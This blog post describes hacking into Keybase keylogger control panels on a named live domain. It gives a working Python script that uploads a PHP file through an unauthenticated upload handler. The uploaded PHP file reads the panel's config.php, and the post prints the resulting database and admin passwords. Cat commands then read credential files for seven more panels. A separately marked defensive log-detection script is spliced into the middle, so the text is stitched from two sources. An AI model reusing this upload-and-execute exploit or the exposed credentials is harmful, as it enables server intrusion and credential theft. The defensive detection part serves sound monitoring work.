1 panel, 2 panels, 3 panels...


I was hanging out on Cybercrime-Tracker and noticed some Keybase panels. I had never heard of that one before, so I decided to take a look. It turns out Keybase is not a botnet but rather a keylogger; it can also take screenshots of the victim's desktop.

One of the domains was still up, and there were 3 Keybase panels listed on Cybercrime Tracker:

The first fail is that permissions are not checked on the /image/Images directory, so anyone aware of this can access the screenshots:

The first two panels didn't have the /image/upload.php file, but luckily for me the ugo one did. Unit 42 had already found some nice vulnerabilities in the Keybase source code, so I tried them.
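From the defender's side, the two weaknesses described above (an upload handler that accepts any file without authentication, and an upload directory that both lacks access control and executes PHP) leave a recognisable trail in the web server's access log: a POST to the upload endpoint followed shortly by a GET of a `.php` file under the upload directory from the same client. The following script is an added example, not code from the post or from the Keybase panel; it parses Apache combined-format log lines and flags that pattern. The log lines are constructed, and the endpoint and directory names are taken from the post (`UPLOAD_ENDPOINT`, `UPLOAD_DIR` and `SCRIPT_EXTENSIONS` are assumptions for this example).

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache "combined" format; they are illustrative,
# not taken from the post or from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /ugo/login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:13:55:40 +0000] "POST /ugo/image/upload.php HTTP/1.1" 200 12 "-" "python-requests/2.7.0"
203.0.113.7 - - [10/Oct/2015:13:55:41 +0000] "GET /ugo/image/Images/owned.php HTTP/1.1" 200 512 "-" "python-requests/2.7.0"
198.51.100.2 - - [10/Oct/2015:13:56:01 +0000] "POST /ugo/image/upload.php HTTP/1.1" 200 12 "-" "KeyBase"
198.51.100.2 - - [10/Oct/2015:13:56:02 +0000] "GET /ugo/image/Images/shot_001.jpg HTTP/1.1" 200 48211 "-" "KeyBase"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumed names for the two paths the post describes: the unauthenticated
# upload handler and the world-readable directory it writes into.
UPLOAD_ENDPOINT = "/image/upload.php"
UPLOAD_DIR = "/image/Images/"
# Extensions the web server would hand to the PHP interpreter (assumed list).
SCRIPT_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    # Drop any query string before inspecting the path.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def is_script_in_upload_dir(path):
    """True when a request targets a server-side script inside the upload directory."""
    return UPLOAD_DIR in path and path.lower().endswith(SCRIPT_EXTENSIONS)


def detect_webshell_uploads(log_text, window_seconds=60):
    """Flag successful GETs of a script inside the upload directory.

    Each finding records whether the same client POSTed to the upload endpoint
    within `window_seconds` beforehand, which is the sequence the post shows.
    """
    records = [r for r in (parse_line(line) for line in log_text.splitlines()) if r]
    window = timedelta(seconds=window_seconds)
    findings = []
    for rec in records:
        if rec["method"] != "GET" or rec["status"] != 200:
            continue
        if not is_script_in_upload_dir(rec["path"]):
            continue
        prior_upload = any(
            r["ip"] == rec["ip"]
            and r["method"] == "POST"
            and r["path"].endswith(UPLOAD_ENDPOINT)
            and timedelta(0) <= rec["ts"] - r["ts"] <= window
            for r in records
        )
        findings.append({"ip": rec["ip"], "path": rec["path"], "ts": rec["ts"],
                         "preceded_by_upload": prior_upload})
    return findings


if __name__ == "__main__":
    for f in detect_webshell_uploads(SAMPLE_LOG):
        print("%s fetched %s at %s (upload seen first: %s)"
              % (f["ip"], f["path"], f["ts"].isoformat(), f["preceded_by_upload"]))
```

The legitimate Keybase client traffic (a POST followed by a GET of a `.jpg`) is not flagged; only the script fetch is. The same logic is the reason the fix on the server side is twofold: the upload handler must allowlist image extensions and content, and the upload directory must be served with script execution disabled, so that even a file that slips through is never run.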

I ran this Python script with the PHP file below as its argument.

```python
import requests
import sys

# Exit when no file was given instead of continuing with a missing argument.
if len(sys.argv) != 2:
    print "Usage: %s [php_file]" % __file__
    sys.exit(1)

URL = "http://www.omarabdulaziz.com/ugo/"
print "Sending request..."

multiple_files = [('file', ('owned.php', open(sys.argv[1], 'rb')))]

r = requests.post(URL + "image/upload.php", files=multiple_files)
print r
print "Results:"

r = requests.get(URL + "image/Images/owned.php")

print r.text
```

The uploaded PHP file:

```php
<?php
    $file = '../../config.php';

    echo "It works!"."</br>";

    if (file_exists($file)) {
        echo "Reading file"."</br>";
        echo file_get_contents($file);
    }
```

Here's the result:

```text
Sending request...
<Response [200]>

It works!</br>Reading file</br><?php
//Edit your database details

$mysql_host = "localhost";
$mysql_database = "omarabdu_ugo";
$mysql_user = "omarabdu_ugo";
$mysql_password = "joinkrama2";

//These are for accessing your web-panel. You can change these any time.

$panelusername = "admin";
$panelpassword = "ugo12345";
```


So of course... I got in

That's pretty cool, but are all the panels on this domain actually listed on Cybercrime-Tracker? I took a look at the public_html folder and found additional panels:

So you got it... Since we have command execution, we can get the passwords for all the panels at once:

```shell
cat /home/omarabdu/public_html/ugo/config.php &
cat /home/omarabdu/public_html/daniel/config.php &
cat /home/omarabdu/public_html/golden/config.php &
cat /home/omarabdu/public_html/chuks/config.php &
cat /home/omarabdu/public_html/panel2/config.php &
cat /home/omarabdu/public_html/owerri/config.php
cat /home/omarabdu/public_html/nonso/config.php
```

keybase, c&c, botnet, malware